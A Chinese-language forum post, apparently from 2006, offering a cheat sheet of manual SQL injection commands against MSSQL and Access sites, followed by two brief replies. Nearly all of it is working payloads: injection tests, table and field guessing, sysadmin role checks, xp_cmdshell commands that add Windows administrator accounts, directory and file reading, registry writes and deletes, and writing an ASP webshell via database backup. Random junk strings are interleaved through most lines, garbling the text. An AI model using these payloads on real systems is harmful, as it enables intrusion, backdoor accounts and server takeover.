社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3306阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ?8H8O %Z8  
  2.初步判断是否是mssql ;and user>0 wy<S;   
%OL$57Ia  
  3.注入参数是字符'and [查询条件] and ''=' R^8o^z['6u  
TM__I\+Q  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,1.p%UE]>  
<6%?OJhp  
  5.判断数据库系统 e-})6)XgA  
GLH0 ]  
  ;and (select count(*) from sysobjects)>0 mssql U#7#aeI  
p}}R-D&K  
  ;and (select count(*) from msysobjects)>0 access x xHY+(m  
S1T"Z{$  
<VMGTBVQ  
_b pP50Cu  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 XAD- 'i  
wyH[x!QX  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 W]$w@.oW[  
H `XUJh  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 CCs%%U/=  
NR$3%0 nC6  
  9.(1)猜字段的ascii值(access) W 8<&gh+  
kP=eW_0D  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Y Vt% 0  
OR P\b  
  (2)猜字段的ascii值(mssql) @o].He@L<j  
CImWd.W9~  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 `P@<3]  
Y,qI@n<  
  10.测试权限结构(mssql) hk;5w{t}}  
h ]5(].  
+qN>.y!Y  
r5S[-`s;  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- '0;l]/i.  
^ox=HNV  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- @Z_x.Y6  
0Uz"^xO["  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- >.Pnkx*  
L8@f-Kk  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- c`)\Pb/O  
KWbI'}_z  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ;HfmzY(  
~p6 V,Q  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- EgEa1l!NSQ  
dM.f]-g  
  ;and 1=(select IS_MEMBER('db_owner'));-- IV~>I-rd  
+zqn<<9  
7uqzm  
B&M%I:i  
  11.添加mssql和系统的帐户 "m):Y;9iQ?  
ZuzEg*lb  
  ;exec master.dbo.sp_addlogin username;-- Y sC>i`n9  
  ;exec master.dbo.sp_password null,username,password;-- ,C\i^>=  
Gq)]s'r2  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- DaQ?\uq  
u=*FI  
  ;exec master.dbo.xp_cmdshell 'net user username password c1(RuP:S  
.|KyNBn  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- BiLY(1,  
kM l+yli3c  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- (Bb5?fw  
EmWn%eMN  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- AG nxYV"p  
f3l&3hC  
fivw~z|[@  
zy?|ODM  
  12.(1)遍历目录 5:[0z5Hww  
0(}t8lc  
  ;create table dirs(paths varchar(100), id int) f].h^ ~.q  
PA{PD.4Du  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' dw>C@c#"  
_ gR;=~S  
  ;and (select top 1 paths from dirs)>0 D(op)]8  
x M/+L:_<  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ] Jg&VXrH  
,$L4dF3  
Wx%H%FeK  
*\a4wZ6<3  
  (2)遍历目录 Ux!p8  
& bm 1Fz  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ?/E~/;+7=  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 w>&aEv/f  
m,_Z6=I:  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Xh"n]TK  
9 RgVK{F  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 WF+99?75  
QD&`^(X1p  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 wo{gG?B  
Z9ZPr?C=  
vkV0On  
F`W?II?  
  13.mssql中的存储过程 nsC3  
Zd%k*BC  
  xp_regenumvalues 注册表根键, 子键 dh iuI|?@  
CI0C1/:@  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Y;M|D'y+  
[#vH'y  
  xp_regread 根键,子键,键值名 (_]~wi-,  
h 0Q5-EA  
  ;exec xp_regread 3BJ0S.TF  
Tn e4  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Wq&if_  
ORw,)l  
  xp_regwrite 根键,子键, 值名, 值类型, 值 .f2bNnB~pP  
%JBz5G  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 R4cM%l_#W  
Qx#"q'2  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 g3/W=~r  
5r|,CQ7o  
  xp_regdeletevalue 根键,子键,值名 U(g:zae  
D?_Zl;bQ'^  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 sf87$S0  
Qbn"=n2  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 lvz7#f L~  
`iNSr?N.  
.@U@xRu7|  
5c0 ZRV#  
  14.mssql的backup创建webshell \ :sUL!  
@o _}g !9=  
  use model *vxk@ `K~  
HyZqUb Ha  
  create table cmd(str image); ZhaP2pC%4  
v>)"HL"XG  
  insert into cmd(str) values (''); PiIpnoM  
2r?G6D|  
  backup database model to disk='c:\l.asp'; K7:)nv E  
-;m0R  
)9`qG:b'  
l<LI7Z]A  
  15.mssql内置函数 AJ`h9 %B  
d.d/<  
  ;and (select @@version)>0 获得Windows的版本号 Id .nu/  
pJ"qu,w  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa M`!H"R7  
ChPmX+.i_  
  ;and (select user_name())>0 爆当前系统的连接用户 vMH  
Ckuh:bs  
  ;and (select db_name())>0 得到当前连接的数据库 #rfiD%c  
UECK:61Me  
f+,qNvBY/  
[!#L6&:a8  
  16.简洁的webshell w-MCZwCr)  
q"8e a/  
  use model Fj3a.'  
/]Md~=yNp  
  create table cmd(str image); 7*A],:-q  
>W+%8e  
  insert into cmd(str) values (''); !ons]^km  
MaQqs=  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八